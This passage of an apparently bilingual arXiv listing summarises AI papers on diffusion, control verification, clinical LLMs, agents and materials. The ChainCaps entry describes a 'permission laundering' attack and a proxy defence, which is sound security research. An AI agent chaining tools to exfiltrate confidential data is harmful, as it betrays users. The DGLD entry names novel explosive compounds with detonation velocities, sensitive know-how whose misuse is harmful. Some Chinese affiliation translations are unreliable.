calibration, highlighting foundation models as promising tools for data-scarce global health prediction.

2605.26582 2026-05-27 cs.LG cs.AI 版本更新

On the Error-Correcting Effects of Stochasticity in Discrete Diffusion

离散扩散中随机性的纠错效应

William Yuan, Sungwon Jeong, Amirali Aghazadeh

发表机构 * Georgia Institute of Technology(佐治亚理工学院)

AI总结 本文系统研究离散扩散模型中马尔可夫转移随机性程度对采样效率与质量的权衡,提出离散搅动与重启采样(DCRS)算法,通过交替正向和反向扩散过程注入受控随机性,在低函数评估次数下改善速度-质量权衡。

详情
AI中文摘要

离散扩散模型在文本和图像生成中取得了强劲性能,但其推理仍然缓慢,且必须内在平衡采样效率与样本质量。在这项工作中,我们系统研究了马尔可夫转移中随机性程度如何主导采样权衡。我们表明,高度确定性的转移收敛迅速但遭受误差累积,而更随机的转移收敛更慢但能达到更高的最终样本质量。通过信息论分析,我们识别出潜在机制为一种由对称地在状态间交换质量的冗余转移诱导的纠错效应,并表明这些转移可证明地收缩采样误差。受此分析启发,我们提出离散搅动与重启采样(DCRS),一种新颖的推理算法,通过交替正向和反向扩散过程注入受控随机性。在合成数据集和大规模基准上的实验表明,DCRS在低函数评估次数下改善了速度-质量权衡。在图像数据集上,与标准采样器相比,DCRS在保持竞争性样本质量的同时,实现了高达10倍的采样步数减少;而在语言基准上,我们观察到更细微的行为,取决于损坏过程和采样程序。

英文摘要

Discrete diffusion models achieve strong performance in text and image generation, but their inference remains slow and must inherently balance sampling efficiency and sample quality. In this work, we present a systematic study of how the \emph{degree of stochasticity} in Markov transitions governs the sampling tradeoff. We show that highly deterministic transitions converge rapidly but suffer from error accumulation, while more stochastic transitions converge more slowly yet can achieve higher final sample quality. Using an information-theoretic analysis, we identify the underlying mechanism as an error-correcting effect induced by \emph{redundant transitions} that symmetrically exchange mass between states, and show that these transitions can provably contract sampling errors. Motivated by this analysis, we propose \emph{Discrete Churn and Restart Sampling} (DCRS), a novel inference algorithm that injects controlled stochasticity by alternating between forward and reverse diffusion processes. Experiments on synthetic datasets and large-scale benchmarks show that DCRS improves the speed-quality tradeoff in the low number of function evaluations regime. On image datasets, DCRS achieves up to a $10\times$ reduction in sampling steps compared to standard samplers while maintaining competitive sample quality, whereas on language benchmarks, we observe more nuanced behavior depending on the corruption process and sampling procedure.

2605.26577 2026-05-27 eess.SY cs.AI cs.LG cs.SY math.OC 版本更新

Bridging Control with Neural Network Verifier alpha-beta-CROWN: A Tutorial

桥接控制与神经网络验证器 alpha-beta-CROWN:教程

Haoyu Li, Xiangru Zhong, Hao Cheng, Bin Hu, Huan Zhang

发表机构 * Department of Computer Science(计算机科学系) Department of Electrical and Computer Engineering(电气与计算机工程系)

AI总结 本教程提出一个统一框架,通过将控制问题与神经网络验证器 α,β-CROWN 桥接,实现控制器属性的可扩展形式验证。

Comments ACC 2026 Tutorial

详情
AI中文摘要

基于学习的控制器合成方法因其高表达力和强经验性能而受到欢迎。然而,在自动驾驶、机器人技术和电力系统等安全关键场景中,仅凭经验性能是不够的,对控制器的稳定性、安全性等属性进行形式验证是非常可取的。不幸的是,许多先前的验证方法要么依赖于系统或证书的特定结构假设,难以在不同设置间迁移,要么在高维神经网络系统上可扩展性差。在本教程中,我们提出了一个统一框架,旨在通过将控制与最先进的神经网络验证器 $α,\!β$-CROWN(alpha-beta-CROWN)桥接来弥合这一差距。其核心是,$α,\!β$-CROWN 是一个通用的边界引擎,用于表示为计算图的非线性函数:给定一个输入域,它可以产生认证边界和非线性函数的显式线性松弛。这些认证边界本身对于可达性分析等任务很有用,并且它们为执行可满足性检查和优化的更复杂例程提供了基础。更具体地说,许多控制问题归结为验证状态域上的实值不等式(例如,李雅普诺夫理论)。因此,$α,\!β$-CROWN 通过计算紧边界并基于边界递归划分和剪枝子域,实现了这些条件的可扩展验证。得益于 GPU 并行化,该流程在对传统方法具有挑战性的验证和优化问题上展示了卓越的可扩展性。在本教程中,我们讨论了 $α,\!β$-CROWN 的基础知识,并介绍了其在各种控制相关任务中的应用。

英文摘要

Learning-based methods for synthesizing controllers have gained popularity due to their high expressiveness and strong empirical performance. However, in safety-critical scenarios such as autonomous driving, robotics, and power systems, empirical performance alone is insufficient, and formal verification of controller properties such as stability and safety is highly desirable. Unfortunately, many prior verification approaches are either tied to specific structural assumptions on the system or the certificate, making them difficult to transfer across settings, or suffer from poor scalability on higher-dimensional neural network systems. In this tutorial, we present a unified framework that aims to mitigate this gap via bridging control with the state-of-the-art neural network verifier $α,\!β$-CROWN (alpha-beta-CROWN). At its core, $α,\!β$-CROWN is a general-purpose bounding engine for nonlinear functions represented as computation graphs: given an input domain, it can produce certified bounds and explicit linear relaxation of the nonlinear function. These certified bounds are useful on their own for tasks such as reachability analysis, and they also provide the foundation for more complex routines that perform satisfiability checking and optimization. More specifically, many control problems reduce to verifying real-valued inequalities over a state domain (e.g., Lyapunov theory). Consequently, $α,\!β$-CROWN enables scalable verification of such conditions by computing tight bounds and recursively partitioning and pruning subdomains based on the bounds. Thanks to GPU parallelization, this pipeline demonstrates superior scalability on verification and optimization problems that are challenging for traditional approaches. In this tutorial, we discuss the basics of $α,\!β$-CROWN and introduce its application to various control-related tasks.

2605.26567 2026-05-27 cs.AI 版本更新

MedGuideX: Internalizing Decision Logic from Executable Guidelines into Large Language Models for Clinical Reasoning

MedGuideX: 将可执行指南中的决策逻辑内化到大型语言模型中以进行临床推理

Yuhao Shen, Lang Cao, Simo Du, Yuqing Wang, Juexiao Zhou, Hao Peng, Yue Guo

发表机构 * University of Illinois Urbana-Champaign(伊利诺伊大学厄巴纳-香槟分校) The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳)) Albert Einstein College of Medicine(爱因斯坦医学院)

AI总结 提出一种将临床实践指南转化为可执行决策逻辑并生成事实与反事实问答数据的训练流程,通过微调医学大语言模型得到MedGuideX,在四个临床推理基准上平均准确率相对提升10.28%,且医生评估显示其推理步骤更优。

详情
AI中文摘要

临床实践指南(CPGs)编码了基于证据的决策逻辑,临床医生通过评估患者变量、条件标准和推荐规则来应用这些逻辑。然而,现有方法通常将CPGs作为自由文本训练数据或检索源,未能充分利用其程序性决策结构。为了更好地利用这种结构,我们引入了一个基于指南的训练流程,将CPG推荐转化为可执行的临床决策逻辑,并利用它生成事实性和反事实性的问答数据。这些数据教会模型既支持指南推荐的决策,也了解在不同患者条件下决策如何变化。在生成的医学数据上对医学大语言模型进行后训练,得到MedGuideX。在四个临床推理基准上,MedGuideX的平均准确率相对提高了10.28%。医生评估进一步表明,MedGuideX能更好地恢复临床医生撰写的推理步骤,并在忠实性、有效性、完整性和清晰度方面产生医生偏好的推理依据。总体而言,我们的结果表明,来自CPGs的可执行决策逻辑可以转化为可扩展的监督信号,用于构建可靠的医学大语言模型。

英文摘要

Clinical practice guidelines (CPGs) encode evidence-based decision logic that clinicians apply by evaluating patient variables, conditional criteria, and recommendation rules. However, existing methods often use CPGs as free-text training data or retrieval sources, underutilizing their procedural decision structure. To better exploit this structure, we introduce a guideline-derived training pipeline that transforms CPG recommendations into executable clinical decision logic and uses it to generate factual and counterfactual question-answering data. Theses data teach models both guideline-supported decisions and how decisions change under different patient conditions. Post-training a medical LLM on the generated data yields MedGuideX. Across four clinical reasoning benchmarks, MedGuideX achieves a 10.28% relative improvement in average accuracy. Physician evaluation further shows that MedGuideX better recovers clinician authored reasoning steps and produces physician-preferred rationales in faithfulness, validity, completeness, and clarity. Overall, our results show that executable decision logic from CPGs can be transformed into scalable supervision for building reliable medical LLMs.

2605.26560 2026-05-27 cs.CL cs.AI 版本更新

Reliable Extraction of Clinical Follow-Up Instructions: A Hybrid Neural-Symbolic Pipeline

可靠提取临床随访指令:一种混合神经符号管道

Michal Laufer, Yehudit Aperstein, Alexander Apartsin

发表机构 * Bar-Ilan University(巴伊兰大学) Afeka College of Engineering(阿菲卡工程学院) Holon Institute of Technology(霍洛恩理工学院)

AI总结 提出混合神经符号管道,结合BioBERT实体提取和确定性日期算术,在合成门诊笔记上实现接近完美的(动作, 日期)对提取F1分数,优于直接生成方法。

Comments 17 pages, 5 figures

详情
AI中文摘要

目标。门诊笔记携带随访指令,将动作与未来时间配对(“两周内进行脑部MRI”)。提取(动作,日期)对支持调度和审计,但生成式提取器会错过日期,因为链接和算术在解码中是隐式的。我们测试了一种混合神经符号管道与直接生成方法的对比。方法。我们定义了TestSpecification和TimeSpecification实体以及ScheduledFor关系。BioBERT提供BIO标注和双仿射链接器;实体通过28动作本体规范化,时间通过确定性方式归一化为天数偏移。我们在一个包含2000份笔记的合成门诊语料库上评估,采用动作不相交划分(18个训练,6个OOV测试),与零样本GPT-4o-mini和LoRA微调LLaMA-3 8B对比,使用笔记级bootstrap 95%置信区间。结果。在259份笔记的已知和OOV划分上,混合管道实现了测试时间对F1分别为0.997和0.986,MAE为0.00天。基线达到了高动作F1(LLaMA-3 0.992;GPT-4o-mini 0.963已知),但对F1保持在0.51-0.57(LLaMA-3)和0.53(GPT-4o-mini),置信区间与混合管道不重叠。结论。将学习的实体提取与确定性日期算术分离在此基准上优于生成方法,泛化到未见动作,并暴露了失败模式。迁移到真实电子健康记录笔记是下一步验证;初步的现实性检查见局限性。

英文摘要

Objective. Outpatient notes carry follow-up instructions pairing actions with future times ("MRI brain in two weeks"). Extracting (action, date) pairs supports scheduling and audit, but generative extractors miss the date because linking and arithmetic are implicit in decoding. We test a hybrid neural-symbolic pipeline against direct generation. Methods. We define TestSpecification and TimeSpecification entities and a ScheduledFor relation. BioBERT feeds BIO tagging and a biaffine linker; entities are canonicalized via a 28-action ontology and times normalized to day offsets deterministically. We evaluate on a 2,000-note synthetic outpatient corpus with action-disjoint splits (18 train, 6 OOV-test) against zero-shot GPT-4o-mini and LoRA-fine-tuned LLaMA-3 8B with note-level bootstrap 95% CIs. Results. On 259-note seen and OOV splits the hybrid pipeline achieves Test-Time Pair F1 of 0.997 and 0.986 with 0.00-day MAE. Baselines reach high action F1 (LLaMA-3 0.992; GPT-4o-mini 0.963 seen) but Pair F1 stays at 0.51-0.57 (LLaMA-3) and 0.53 (GPT-4o-mini), CIs non-overlapping with the hybrid. Conclusion. Separating learned entity extraction from deterministic date arithmetic outperforms generation on this benchmark, generalizes to held-out actions, and exposes failure modes. Transfer to real EHR notes is the next validation; a first-pass realism check is in Limitations.

2605.26559 2026-05-27 cs.LG cs.AI econ.EM 版本更新

Auditing and Fixing Economic Validity in Tabular Foundation Models for Discrete Choice

审计与修复离散选择中表格基础模型的经济有效性

Yingshuo Wang, Xian Sun, Yanhang Li, Zhichao Fan, Zexin Zhuang

发表机构 * University of California, Berkeley, CA, USA(加州大学伯克利分校) Duke University, Durham, NC, USA(杜克大学) Northeastern University, Boston, MA, USA(东北大学) University of Illinois Urbana-Champaign, IL, USA(伊利诺伊大学厄巴纳-香槟分校) Southern Methodist University, Dallas, TX, USA(南方 Methodist 大学)

AI总结 提出两阶段适配器,将表格基础模型预测嵌入效用最大化框架,在保证经济一致性的同时提升选择预测精度。

Comments 5 pages, 1 table. Accepted at the FMSD Workshop, ICML 2026

详情
AI中文摘要

表格基础模型在选择预测任务上取得了很高的准确率,但其预测常常违反这些任务所需的经济逻辑:提高价格有时会增加预测需求,隐含的支付意愿估计经常为负或不合理。我们提出了一种两阶段适配器,将基础模型预测嵌入效用最大化框架。在第一阶段,我们估计一个标准选择模型,其参数受经济理论约束。在第二阶段,我们冻结这些参数,并训练一个校正项,将基础模型的预测作为附加信息纳入。结果模型继承了基础模型的精度提升,同时保证了政策扰动下价格-需求的单调关系,并产生可解析计算的权衡指标。在两个交通数据集上,适配器在保持完美经济一致性的同时,相比标准logit模型恢复了高达13个百分点的准确率,这是原始基础模型或传统蒸馏都无法实现的。

英文摘要

Tabular foundation models achieve strong accuracy on choice prediction tasks, but their predictions often violate the economic logic those tasks require: raising a price sometimes increases predicted demand, and implied willingness-to-pay estimates are frequently negative or implausible. We propose a two-stage adapter that embeds foundation model predictions within a utility-maximization framework. In the first stage, we estimate a standard choice model whose parameters are constrained to obey economic theory. In the second stage, we freeze those parameters and train a correction term that incorporates the foundation model's predictions as additional information. The result is a model that inherits the foundation model's accuracy gains while guaranteeing monotonic price-demand relationships under policy perturbation and producing analytically computable trade-off measures. On two transportation datasets, the adapter recovers up to 13 percentage points of accuracy over a standard logit model while maintaining perfect economic consistency, something neither the raw foundation models nor conventional distillation achieve.

2605.26554 2026-05-27 cs.LG cs.AI 版本更新

Linear and Neural Dueling Bandits with Delayed Feedback

线性与神经延迟反馈的对抗性赌博机

Xiangyi Wang, Pingchen Lu, Jie Mao, Mingze Kong, Zhi Hong, Zhiyong Wang, Zhongxiang Dai

发表机构 * The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳)) The Chinese University of Hong Kong(香港中文大学)

AI总结 针对随机延迟反馈下的上下文对抗性赌博机问题,提出线性(LDB-DF)和神经(NDB-DF)两种算法,通过将逆概率加权(IPW)机制直接融入损失函数实现无偏校正,并给出线性设置下O(d*sqrt(T))的遗憾界和神经设置下的次线性保证。

详情
AI中文摘要

上下文对抗性赌博机构成了基于偏好的决策制定的基石,在推荐系统和大语言模型对齐中有关键应用。然而,标准算法依赖于即时反馈的理想化假设,这一条件在现实场景(如提示优化)中经常被违反。这种设置带来了独特的理论挑战:与线性赌博机不同,对抗性赌博机估计量缺乏闭式解,使得标准加权技术的朴素适应产生偏差。为解决这一问题,我们形式化了具有随机延迟反馈的上下文对抗性赌博机问题,并提出了两种新颖算法:线性延迟反馈对抗性赌博机(LDB-DF)和神经延迟反馈对抗性赌博机(NDB-DF)。我们方法的核心是一种新颖的估计量,它将逆概率加权(IPW)机制直接集成到损失函数中,确保对延迟或缺失反馈的无偏校正。我们提供了全面的理论分析,为线性设置建立了O(d*sqrt(T))的遗憾界,并为神经设置建立了次线性保证。在模拟和真实数据集上的大量实验证明了我们提出方法的有效性。

英文摘要

Contextual dueling bandits form a cornerstone of preference-based decision-making, with critical applications in recommender systems and large language model alignment. However, standard algorithms rely on the idealized assumption of immediate feedback, a condition frequently violated in real-world scenarios such as prompt optimization. This setting introduces a unique theoretical challenge: unlike linear bandits, dueling bandit estimators lack closed-form solutions, rendering naive adaptations of standard weighting techniques biased. To address this, we formalize the problem of Contextual Dueling Bandits with Stochastic Delayed Feedback and propose two novel algorithms: Linear (LDB-DF) and Neural (NDB-DF) Dueling Bandits with Delayed Feedback. Central to our approach is a novel estimator that integrates an Inverse Probability Weighting (IPW) mechanism directly into the loss function, ensuring unbiased correction for delayed or missing feedback. We provide comprehensive theoretical analysis, establishing an O(d*sqrt(T)) regret bound for the linear setting and sub-linear guarantees for the neural setting. Extensive experiments on both simulated and real-world datasets demonstrate the effectiveness of our propose.

2605.26546 2026-05-27 cs.AI 版本更新

MobileExplorer: Accelerating On-Device Inference for Mobile GUI Agents via Online Exploration

MobileExplorer: 通过在线探索加速移动GUI代理的端侧推理

Runxi Huang, Liyu Zhang, Shengzhong Liu, Xiaomin Ouyang

发表机构 * Hong Kong University of Science and Technology(香港理工大学) Shanghai Jiao Tong University(上海交通大学)

AI总结 提出MobileExplorer框架,通过在线探索并行探测UI元素并记录为结构化记忆,结合两级回滚机制,减少推理步骤和延迟,提升移动GUI代理的端侧部署效率。

详情
AI中文摘要

移动图形用户界面(GUI)代理使AI模型能够代表用户自主操作智能手机。然而,现有系统主要关注优化任务准确性,并依赖云端模型进行推理,这引入了隐私问题和网络依赖延迟。因此,移动GUI代理的完全端侧部署仍未被充分探索。我们提出MobileExplorer,一种通过在线探索加速基于视觉的移动GUI代理端侧推理的新框架。关键思想是利用视觉语言模型(VLM)较长的每步推理时间,对UI元素进行轻量级并行探索。在模型推理期间,代理主动探测语义相关的UI元素,并将这些探索轨迹记录为结构化记忆。为确保在真实移动环境中可靠执行,我们设计了两级回滚机制,当快速但简单的回溯策略失败时,能够稳健地恢复初始UI状态。收集的探索轨迹随后被总结为简洁的上下文提示,并注入到提示中,以增强后续推理步骤。我们在多个现成设备上使用AndroidWorld基准测试以及新设计的更复杂任务和动态端侧环境评估了MobileExplorer。MobileExplorer将平均推理步骤数和端到端延迟减少了23%,同时将任务成功率维持或提高了高达5%。真实世界中MobileExplorer性能的视频演示可在https://youtu.be/thK7MJmdlvM获取。

英文摘要

Mobile graphical user interface (GUI) agents enable AI models to autonomously operate smartphones on behalf of users. However, most existing systems focus primarily on optimizing task accuracy and rely on cloud-hosted models for inference, which introduces privacy concerns and network-dependent latency. As a result, fully on-device deployment of mobile GUI agents remains underexplored. We propose MobileExplorer, a new framework that accelerates on-device inference for vision-based mobile GUI agents via online exploration. The key idea is to exploit the long per-step reasoning time of vision-language models (VLMs) by performing lightweight, parallel exploration of UI elements. During model inference, the agent proactively probes semantically relevant UI elements and records these exploration traces as structured memory. To ensure reliable execution in live mobile environments, we design a two-level rollback mechanism that robustly restores the initial UI state when a fast but naive backtracking strategy fails. The collected exploration traces are then summarized into concise contextual hints and injected into the prompt to enhance the subsequent reasoning step. We evaluate MobileExplorer on multiple off-the-shelf devices using the AndroidWorld benchmark, as well as newly designed, more complex tasks and dynamic on-device environments. MobileExplorer reduces the average number of reasoning steps and end-to-end latency by 23\%, while maintaining or improving task success rates by up to 5\%. A video demonstration of MobileExplorer performance in the real world is available at https://youtu.be/thK7MJmdlvM .

2605.26543 2026-05-27 cs.AI cs.LG 版本更新

PolyFusionAgent: A Multimodal Foundation Model and Autonomous AI Assistant for Polymer Property Prediction and Inverse Design

PolyFusionAgent: 用于聚合物性能预测和逆向设计的多模态基础模型与自主AI助手

Manpreet Kaur, Xingying Zhang, Qian Liu

发表机构 * Department of Applied Computer Science, The University of Winnipeg(应用计算机科学系,温尼伯大学) Department of Mechanical Engineering, University of Manitoba(机械工程系,曼尼托巴大学)

AI总结 提出PolyFusionAgent框架,结合多模态聚合物基础模型PolyFusion和工具增强的设计代理PolyAgent,通过对齐序列、拓扑、3D几何和指纹等多模态视图学习共享潜在空间,实现热物理性能预测和化学有效、结构新颖的聚合物逆向设计,并利用文献证据检索闭环设计流程。

Comments 23 pages, 5 figures, 2 tables; Supplementary material included

详情
AI中文摘要

聚合物的发现对于从能量存储到生物医学等领域至关重要,但受到天文数字般的化学设计空间以及结构、性能和先验知识的碎片化表示的阻碍。这种碎片化使得许多AI模型与物理和实验现实脱节,限制了它们支持直接可操作设计决策的能力。在这里,我们介绍PolyFusionAgent,一个交互式框架,将多模态聚合物基础模型(PolyFusion)与工具增强、基于文献的设计代理(PolyAgent)相结合。PolyFusion对齐互补的聚合物视图,包括序列、拓扑、3D几何和指纹,跨越数百万种聚合物,学习一个跨化学和数据体系可迁移的共享潜在空间,改进了热物理性能预测,并实现了超出参考设计空间的化学有效、结构新颖聚合物的性能条件生成。PolyAgent通过将预测和逆向设计与从聚合物文献中检索证据联系起来,在一个工作流中提出、评估和情境化假设,从而闭合设计循环。PolyFusionAgent共同实现了交互式、证据关联的聚合物发现,结合了大规模表示学习、多模态化学知识和可验证的科学推理。

英文摘要

Polymer discovery is central to fields ranging from energy storage to biomedicine, but it is hindered by an astronomically large chemical design space and fragmented representations of structure, properties, and prior knowledge. This fragmentation leaves many AI models disconnected from physical and experimental reality, restricting their ability to support directly actionable design decisions. Here we introduce PolyFusionAgent, an interactive framework coupling a multimodal polymer foundation model (PolyFusion) with a tool-augmented, literature-grounded design agent (PolyAgent). PolyFusion aligns complementary polymer views including sequence, topology, 3D geometry, and fingerprints across millions of polymers to learn a shared latent space transferable across chemistries and data regimes, improving thermophysical property prediction and enabling property-conditioned generation of chemically valid, structurally novel polymers beyond the reference design space. PolyAgent closes the design loop by linking prediction and inverse design with evidence retrieval from the polymer literature, proposing, evaluating, and contextualizing hypotheses with explicit precedent in one workflow. Together, PolyFusionAgent enables interactive, evidence-linked polymer discovery combining large-scale representation learning, multimodal chemical knowledge, and verifiable scientific reasoning.

2605.26542 2026-05-27 cs.CR cs.AI 版本更新

ChainCaps: Composition-Safe Tool-Using Agents via Monotonic Capability Attenuation

ChainCaps: 通过单调能力衰减实现组合安全的工具使用智能体

Xiaochong Jiang, Shiqi Yang, Ziwei Li, Lifei Liu, Haoran Yu, Yichen Liu

发表机构 * Independent Researcher, Seattle, WA, USA(华盛顿州塞勒姆独立研究员) Independent Researcher, New York City, NY, USA(纽约市纽约独立研究员) King Abdullah University of Science and Technology(国王阿卜杜勒阿齐兹科学技术大学)

AI总结 针对工具组合中的权限洗钱漏洞,提出ChainCaps机制,通过运行时能力预算交集传播规则,在不修改智能体或工具服务器的情况下,将攻击成功率从25-68%降至0-4.8%,同时保持96-100%的良性任务完成率。

Comments Published at the Second Workshop on Agents in the Wild: Safety, Security, and Beyond (AIWILD) at ICML 2026

详情
AI中文摘要

工具使用智能体越来越多地在开放式部署环境中运行,它们会在运行时组合文件系统、Web API、代码解释器和企业服务。这造成了工具组合中的安全缺口:智能体可以通过每个工具的权限检查,但仍然产生不安全的端到端效果,例如读取机密文档、总结并将其发送到外部端点。我们将这种失败模式称为权限洗钱。ChainCaps通过一个运行时规则解决这一问题:每个值携带一个特定于接收器的能力预算,工具组合通过交集传播预算。一个值在通过工具链时可能保留或失去权限,但无法通过组合获得新权限。我们将ChainCaps实现为一个透明的MCP代理,无需对智能体或工具服务器进行任何更改。在来自三个提供商的五个前沿模型的82个任务上,ChainCaps将攻击成功率从25-68%降低到0-4.8%,同时保留了96-100%的良性完成率。在重放实验中,它也优于标量IFC和每函数隔离基线。清单质量是主要的部署瓶颈:专家清单达到100%的攻击阻止,而朴素清单则降至27.3%。我们的主张仅限于在可信清单和代理可见数据移动下的显式流组合安全性,这是当前部署的工具使用智能体中的一个实际缺口。

英文摘要

Tool-using agents increasingly operate in open-ended deployment environments, where they compose file systems, web APIs, code interpreters, and enterprise services at runtime. This creates a safety gap in tool composition: an agent can satisfy every per-tool permission check and still produce an unsafe end-to-end effect, such as reading a confidential document, summarizing it, and sending the summary to an external endpoint. We call this failure mode permission laundering. ChainCaps addresses it with a runtime rule: every value carries a sink-specific capability budget, and tool composition propagates budgets by intersection. A value can preserve or lose authority as it moves through a tool chain, but it cannot gain new authority through composition. We implement ChainCaps as a transparent MCP proxy that requires no changes to the agent or tool servers. On 82 tasks across five frontier models from three providers, ChainCaps reduces attack success rate from 25-68% to 0-4.8% while preserving 96-100% benign completion. In replay experiments, it also outperforms scalar-IFC and per-function-isolation baselines. Manifest quality is the dominant deployment bottleneck: expert manifests reach 100% attack blocking, while naive manifests fall to 27.3%. Our claims are limited to explicit-flow composition safety under trusted manifests and proxy-visible data movement, a practical gap in deployed tool-using agents today.

2605.26540 2026-05-27 physics.chem-ph cs.AI 版本更新

DGLD: Domain-Gated Latent Diffusion for the Discovery of Novel Energetic Materials

DGLD: 用于发现新型含能材料的域门控潜在扩散

Yehudit Aperstein, Alexander Apartsin

发表机构 * Department of Intelligent Systems, Afeka Tel -Aviv College of Engineering(智能系统系,阿费卡特拉维工程学院) School of Computer Science, Faculty of Sciences, HIT -Holon Institute of Technology(计算机科学学院,科学学院,希伯来理工学院)

AI总结 提出域门控潜在扩散模型(DGLD),通过标签质量门控、多任务评分引导和四阶段化学验证漏斗,从稀疏标记数据中生成12个经DFT验证的新型含能材料候选物,其中领先化合物L1和E1在爆速和结构新颖性上表现优异。

Comments 49 pages, 25 figures

详情
AI中文摘要

含能材料的性能提升直接转化为推进剂质量减少、弹头小型化以及更高效的民用气体发生器,然而十五年来没有新的HMX类化合物被公开。设计这样一个化合物是一个稀疏标签问题:在约6.6万个标记的CHNO分子中,只有约3000个带有实验或DFT质量测量值,而在完整混合物上训练的朴素生成模型要么记忆高性能尾部,要么在无校准的情况下外推。我们引入了域门控潜在扩散(DGLD):训练时的标签质量门控、采样时的多任务评分模型引导,以及一个以第一性原理DFT审计结束的四阶段化学验证漏斗。结果是12个经DFT确认的新候选物。主打化合物3,4,5-三硝基-1,2-异噁唑(L1)达到ρ_cal=2.09 g/cm³和D_K-J,cal=8.25 km/s,且与所有65980个训练分子结构不同(最近邻Tanimoto系数0.27)。另一个主打候选物E1(4-硝基-1,2,3,5-氧杂三唑)在标定爆速(D_K-J,cal=9.00 km/s)上超过L1,且其化学型家族与L1的不相交。DGLD是唯一在DFT级别上落入生产性象限(同时新颖且达标)的方法。SMILES-LSTM精确记忆了其18.3%的输出;SELFIES-GA的最佳新颖候选物在DFT审计下损失了3.5 km/s;REINVENT 4生成了新颖的高氮杂环,但峰值仅为D=9.02 km/s。代码、检查点和918个挖掘的硬负样本已在Zenodo上发布(DOI 10.5281/zenodo.19821953);下一个进入HMX类能带的化合物可以以几个GPU天的成本被发现、验证并推荐合成。

英文摘要

Energetic-materials performance gains translate directly into reduced propellant mass, smaller warheads, and more efficient civilian gas-generators, yet no new HMX-class compound has been disclosed in fifteen years. Designing one is a sparse-label problem: of ~66 k labelled CHNO molecules only ~3 k carry experimental or DFT-quality measurements, and naive generative models trained on the full mixture either memorise the high-performance tail or extrapolate without calibration. We introduce Domain-Gated Latent Diffusion (DGLD): a label-quality gate at training time, multi-task score-model guidance at sample time, and a four-stage chemistry-validation funnel ending in first-principles DFT audit. The result is 12 DFT-confirmed novel leads. The headline compound, 3,4,5-trinitro-1,2-isoxazole (L1), reaches \r{ho}_"cal" =2.09 g/cm3 and D_"K-J,cal" =8.25 km/s and is structurally dissimilar from all 65 980 training molecules (nearest-neighbour Tanimoto 0.27). A co-headline lead, E1 (4-nitro-1,2,3,5-oxatriazole), exceeds L1 on calibrated detonation velocity (D_"K-J,cal" =9.00 km/s) from a chemotype family disjoint from L1's. DGLD is the only method to land in the productive quadrant (simultaneously novel and on-target) at DFT level. SMILES-LSTM memorises 18.3% of its outputs exactly; SELFIES-GA's best novel candidate loses 3.5 km/s under DFT audit; REINVENT 4 generates novel high-N heterocycles but peaks at D=9.02 km/s. Code, checkpoints, and 918 mined hard negatives are released on Zenodo (DOI 10.5281/zenodo.19821953); the next compound to enter the HMX-class band can be discovered, validated, and recommended for synthesis at the cost of a few GPU-days.

2605.26535 2026-05-27 cs.LG cs.AI cs.CV cs.NA math.NA 版本更新

Recursive Flow Matching

递归流匹配

Jiahe Huang, Sihan Xu, Sharvaree Vadgama, Rose Yu

发表机构 * University of California, San Diego(加州大学圣地亚哥分校) University of Michigan(密歇根大学)

AI总结 提出递归流匹配(RecFM)框架,通过自一致性约束对齐不同离散化尺度的轨迹,实现高保真单步或少步(2-4步)动态生成,在科学基准上相比领先扩散模拟器加速20倍且提升预测精度。

Comments Project page: https://jhhuangchloe.github.io/RecFM/

详情
AI中文摘要

生成模型已成为解决物理系统和建模复杂时空动态的强大范式。然而,在不产生高计算成本的情况下实现高物理精度仍然是一个基本挑战,因为现有方法面临关键的速度-保真度权衡。在这项工作中,我们引入了递归流匹配(RecFM),一个用于预测复杂时空动态的生成框架。RecFM强制执行自一致性以对齐跨离散化尺度的轨迹,减少离散化误差并改善基于物理任务的各种指标。据我们所知,这是第一种在科学系统中实现高保真单步和少步(2-4步)动态生成的方法,其性能可与最先进的多步求解器相媲美。在具有挑战性的科学基准测试中,RecFM相比领先的扩散模拟器实现了高达20倍的加速,同时提高了预测精度。此外,与普通流匹配相比,RecFM将均方误差降低了超过15%,为实时科学模拟提供了一种可扩展且高效的解决方案。

英文摘要

Generative models have emerged as a powerful paradigm for solving physics systems and modeling complex spatiotemporal dynamics. However, achieving high physical accuracy without incurring high computational cost remains a fundamental challenge, as existing approaches face a critical speed-fidelity trade-off. In this work, we introduce Recursive Flow Matching (RecFM), a generative framework for forecasting complex spatiotemporal dynamics. RecFM enforces self-consistency to align trajectories across discretization scales, reducing discretization errors and improving performance across metrics for physics-based tasks. To our knowledge, this is the first method to achieve high-fidelity one- and few-step (2-4 step) dynamic generation for scientific systems with performance comparable to state-of-the-art multi-step solvers. Across challenging scientific benchmarks, RecFM achieves up to a 20$\times$ speedup over leading diffusion-based emulators while improving predictive accuracy. Furthermore, RecFM reduces mean squared error by over 15% compared to vanilla flow matching, offering a scalable and efficient solution for real-time scientific emulation.

2605.26533 2026-05-27 cs.CV cs.AI cs.CL cs.LG 版本更新

A Hybrid Vision-Language Architecture for Automated Defect Reasoning and Report Generation in Industrial Inspection

一种用于工业检测中自动缺陷推理与报告生成的混合视觉-语言架构

Malikussaid, Imad Gohar

发表机构 * School of Computing, Telkom University(Telkom大学计算机学院) Faculty of Engineering and Technology, School of Computing and Artificial Intelligence(工程与技术学院,计算与人工智能学院)

AI总结 本文提出一种解耦的边缘可部署管道,结合YOLO26-x-obb检测器、确定性编码模块和QLoRA微调的Qwen-2.5-1.5B模型,实现风电叶片缺陷定位与结构化报告生成,在BLEU-4、幻觉率和专家评分上显著优于零样本VLM基线。

Comments 23 pages, 6 figures, 9 equations, and 6 tables

详情
AI中文摘要

